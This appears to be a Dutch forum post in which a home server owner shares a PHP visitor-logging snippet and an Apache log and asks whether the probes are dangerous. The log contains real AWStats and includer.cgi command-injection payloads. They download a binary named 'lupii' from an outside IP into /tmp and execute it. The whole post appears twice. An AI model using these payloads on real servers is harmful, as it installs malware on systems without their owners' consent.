Ik heb al een paar jaar een linux servertje draaien, nu ongeveer een jaar met GENTOO, wat trwns erg goed bevalt.
Nu heb ik een tijdje geleden mijn startpagina maar es veranderd, zodat hij logt welke ip's er een verbinding maken met mijn server.
Nu komen er nogal vreemde resultaten uit.. en naar het kijken in mijn log file begin ik nog meer te twijfelen aan de mate waarin mijn server dicht zit.
enkele stats:
165 83.115.191.251 80 AOrleans-252-1-65-251.w83-115.abo.wanadoo.fr Wed 9-11-05 19:26:12
175 221.169.56.134 25 221-169-56-134.adsl.static.seed.net.tw Sat 12-11-05 14:18:55
182 59.104.54.161 25 59-104-54-161.adsl.dynamic.seed.net.tw Sun 13-11-05 14:46:42
Het meest vreemde vind ik dat ze op poort 25 connecten (tenmiste dat geeft dit script aan), terwijl ik op 25 m'n mail daemon heb draaien, en zeker geen apache server...
BTW, dat scriptje maakt gebruik van het volgende:
$ip = $_SERVER['REMOTE_ADDR'];
$port = $_SERVER['SERVER_PORT'];
$host = gethostbyaddr($ip);
$refer = $_SERVER['HTTP_REFERER'];
En een stukje log:
83.30.113.116 - - [13/Nov/2005:11:31:11 +0100] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%3bchmod%2
0%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e193%2e244;echo%20YYY;echo| HTTP/1.1" 404 279
83.30.113.116 - - [13/Nov/2005:11:31:12 +0100] "GET /scgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%3bchmod%
20%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e193%2e244;echo%20YYY;echo| HTTP/1.1" 404 280
83.30.113.116 - - [13/Nov/2005:11:31:13 +0100] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%3bchmod%2
0%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e193%2e244;echo%20YYY;echo| HTTP/1.1" 404 279
83.30.113.116 - - [13/Nov/2005:11:31:14 +0100] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%3
bchmod%20%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e193%2e244;echo%20YYY;echo| HTTP/1.1" 404 287
83.30.113.116 - - [13/Nov/2005:11:31:15 +0100] "GET /scgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%
3bchmod%20%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e193%2e244;echo%20YYY;echo| HTTP/1.1" 404 288
83.30.113.116 - - [13/Nov/2005:11:31:16 +0100] "GET /cgi/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%3bchm
od%20%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e193%2e244;echo%20YYY;echo| HTTP/1.1" 404 283
83.30.113.116 - - [13/Nov/2005:11:31:17 +0100] "GET /scgi/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%3bch
mod%20%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e193%2e244;echo%20YYY;echo| HTTP/1.1" 404 284
83.30.113.116 - - [13/Nov/2005:11:31:18 +0100] "GET /scripts/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%3bchmod%2
0%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e193%2e244;echo%20YYY;echo| HTTP/1.1" 404 279
83.30.113.116 - - [13/Nov/2005:11:31:19 +0100] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%3
bchmod%20%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e193%2e244;echo%20YYY;echo| HTTP/1.1" 404 287
83.30.113.116 - - [13/Nov/2005:11:31:20 +0100] "GET /scgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%
3bchmod%20%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e193%2e244;echo%20YYY;echo| HTTP/1.1" 404 288
83.30.113.116 - - [13/Nov/2005:11:31:21 +0100] "GET /cgi-bin/stats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%3bc
hmod%20%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e193%2e244;echo%20YYY;echo| HTTP/1.1" 404 285
83.30.113.116 - - [13/Nov/2005:11:31:22 +0100] "GET /scgi-bin/stats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%3b
chmod%20%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e193%2e244;echo%20YYY;echo| HTTP/1.1" 404 286
83.30.113.116 - - [13/Nov/2005:11:31:23 +0100] "GET /stats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%3bchmod%20%
2bx%20lupii%3b%2e%2flupii%2062%2e101%2e193%2e244;echo%20YYY;echo| HTTP/1.1" 404 277
83.30.113.116 - - [13/Nov/2005:11:31:24 +0100] "POST /xmlrpc.php HTTP/1.1" 404 271
83.30.113.116 - - [13/Nov/2005:11:31:25 +0100] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 404 278
83.30.113.116 - - [13/Nov/2005:11:31:27 +0100] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 404 278
83.30.113.116 - - [13/Nov/2005:11:31:28 +0100] "POST /blog/xmlrpc.php HTTP/1.1" 404 276
83.30.113.116 - - [13/Nov/2005:11:31:29 +0100] "POST /drupal/xmlrpc.php HTTP/1.1" 404 278
83.30.113.116 - - [13/Nov/2005:11:31:30 +0100] "POST /community/xmlrpc.php HTTP/1.1" 404 281
83.30.113.116 - - [13/Nov/2005:11:31:31 +0100] "POST /blogs/xmlrpc.php HTTP/1.1" 404 277
83.30.113.116 - - [13/Nov/2005:11:31:32 +0100] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 284
83.30.113.116 - - [13/Nov/2005:11:31:33 +0100] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 283
83.30.113.116 - - [13/Nov/2005:11:31:34 +0100] "POST /blogtest/xmlsrv/xmlrpc.php HTTP/1.1" 404 287
83.30.113.116 - - [13/Nov/2005:11:31:35 +0100] "POST /b2/xmlsrv/xmlrpc.php HTTP/1.1" 404 281
83.30.113.116 - - [13/Nov/2005:11:31:36 +0100] "POST /b2evo/xmlsrv/xmlrpc.php HTTP/1.1" 404 284
83.30.113.116 - - [13/Nov/2005:11:31:37 +0100] "POST /wordpress/xmlrpc.php HTTP/1.1" 404 281
83.30.113.116 - - [13/Nov/2005:11:31:38 +0100] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 404 284
83.30.113.116 - - [13/Nov/2005:11:31:40 +0100] "GET /cgi-bin/includer.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\
"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 281
Vooral m'n log staat nogal vol met deze fouten.. Als ik het goed intepreteer, dan lijkt het er op dat iemand de onlangs verschenen lekken in bepaalde php software probeert te misbruiken.
Weet iemand wat dit is en vooral, of het kwaad kan??
Alvast bedankt
Nu heb ik een tijdje geleden mijn startpagina maar es veranderd, zodat hij logt welke ip's er een verbinding maken met mijn server.
Nu komen er nogal vreemde resultaten uit.. en naar het kijken in mijn log file begin ik nog meer te twijfelen aan de mate waarin mijn server dicht zit.
enkele stats:
165 83.115.191.251 80 AOrleans-252-1-65-251.w83-115.abo.wanadoo.fr Wed 9-11-05 19:26:12
175 221.169.56.134 25 221-169-56-134.adsl.static.seed.net.tw Sat 12-11-05 14:18:55
182 59.104.54.161 25 59-104-54-161.adsl.dynamic.seed.net.tw Sun 13-11-05 14:46:42
Het meest vreemde vind ik dat ze op poort 25 connecten (tenmiste dat geeft dit script aan), terwijl ik op 25 m'n mail daemon heb draaien, en zeker geen apache server...
BTW, dat scriptje maakt gebruik van het volgende:
$ip = $_SERVER['REMOTE_ADDR'];
$port = $_SERVER['SERVER_PORT'];
$host = gethostbyaddr($ip);
$refer = $_SERVER['HTTP_REFERER'];
En een stukje log:
83.30.113.116 - - [13/Nov/2005:11:31:11 +0100] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%3bchmod%2
0%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e193%2e244;echo%20YYY;echo| HTTP/1.1" 404 279
83.30.113.116 - - [13/Nov/2005:11:31:12 +0100] "GET /scgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%3bchmod%
20%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e193%2e244;echo%20YYY;echo| HTTP/1.1" 404 280
83.30.113.116 - - [13/Nov/2005:11:31:13 +0100] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%3bchmod%2
0%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e193%2e244;echo%20YYY;echo| HTTP/1.1" 404 279
83.30.113.116 - - [13/Nov/2005:11:31:14 +0100] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%3
bchmod%20%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e193%2e244;echo%20YYY;echo| HTTP/1.1" 404 287
83.30.113.116 - - [13/Nov/2005:11:31:15 +0100] "GET /scgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%
3bchmod%20%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e193%2e244;echo%20YYY;echo| HTTP/1.1" 404 288
83.30.113.116 - - [13/Nov/2005:11:31:16 +0100] "GET /cgi/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%3bchm
od%20%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e193%2e244;echo%20YYY;echo| HTTP/1.1" 404 283
83.30.113.116 - - [13/Nov/2005:11:31:17 +0100] "GET /scgi/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%3bch
mod%20%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e193%2e244;echo%20YYY;echo| HTTP/1.1" 404 284
83.30.113.116 - - [13/Nov/2005:11:31:18 +0100] "GET /scripts/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%3bchmod%2
0%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e193%2e244;echo%20YYY;echo| HTTP/1.1" 404 279
83.30.113.116 - - [13/Nov/2005:11:31:19 +0100] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%3
bchmod%20%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e193%2e244;echo%20YYY;echo| HTTP/1.1" 404 287
83.30.113.116 - - [13/Nov/2005:11:31:20 +0100] "GET /scgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%
3bchmod%20%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e193%2e244;echo%20YYY;echo| HTTP/1.1" 404 288
83.30.113.116 - - [13/Nov/2005:11:31:21 +0100] "GET /cgi-bin/stats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%3bc
hmod%20%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e193%2e244;echo%20YYY;echo| HTTP/1.1" 404 285
83.30.113.116 - - [13/Nov/2005:11:31:22 +0100] "GET /scgi-bin/stats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%3b
chmod%20%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e193%2e244;echo%20YYY;echo| HTTP/1.1" 404 286
83.30.113.116 - - [13/Nov/2005:11:31:23 +0100] "GET /stats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%3bchmod%20%
2bx%20lupii%3b%2e%2flupii%2062%2e101%2e193%2e244;echo%20YYY;echo| HTTP/1.1" 404 277
83.30.113.116 - - [13/Nov/2005:11:31:24 +0100] "POST /xmlrpc.php HTTP/1.1" 404 271
83.30.113.116 - - [13/Nov/2005:11:31:25 +0100] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 404 278
83.30.113.116 - - [13/Nov/2005:11:31:27 +0100] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 404 278
83.30.113.116 - - [13/Nov/2005:11:31:28 +0100] "POST /blog/xmlrpc.php HTTP/1.1" 404 276
83.30.113.116 - - [13/Nov/2005:11:31:29 +0100] "POST /drupal/xmlrpc.php HTTP/1.1" 404 278
83.30.113.116 - - [13/Nov/2005:11:31:30 +0100] "POST /community/xmlrpc.php HTTP/1.1" 404 281
83.30.113.116 - - [13/Nov/2005:11:31:31 +0100] "POST /blogs/xmlrpc.php HTTP/1.1" 404 277
83.30.113.116 - - [13/Nov/2005:11:31:32 +0100] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 284
83.30.113.116 - - [13/Nov/2005:11:31:33 +0100] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 283
83.30.113.116 - - [13/Nov/2005:11:31:34 +0100] "POST /blogtest/xmlsrv/xmlrpc.php HTTP/1.1" 404 287
83.30.113.116 - - [13/Nov/2005:11:31:35 +0100] "POST /b2/xmlsrv/xmlrpc.php HTTP/1.1" 404 281
83.30.113.116 - - [13/Nov/2005:11:31:36 +0100] "POST /b2evo/xmlsrv/xmlrpc.php HTTP/1.1" 404 284
83.30.113.116 - - [13/Nov/2005:11:31:37 +0100] "POST /wordpress/xmlrpc.php HTTP/1.1" 404 281
83.30.113.116 - - [13/Nov/2005:11:31:38 +0100] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 404 284
83.30.113.116 - - [13/Nov/2005:11:31:40 +0100] "GET /cgi-bin/includer.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\
"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 281
Vooral m'n log staat nogal vol met deze fouten.. Als ik het goed intepreteer, dan lijkt het er op dat iemand de onlangs verschenen lekken in bepaalde php software probeert te misbruiken.
Weet iemand wat dit is en vooral, of het kwaad kan??
Alvast bedankt
The easiest way to solve a problem is just to solve it.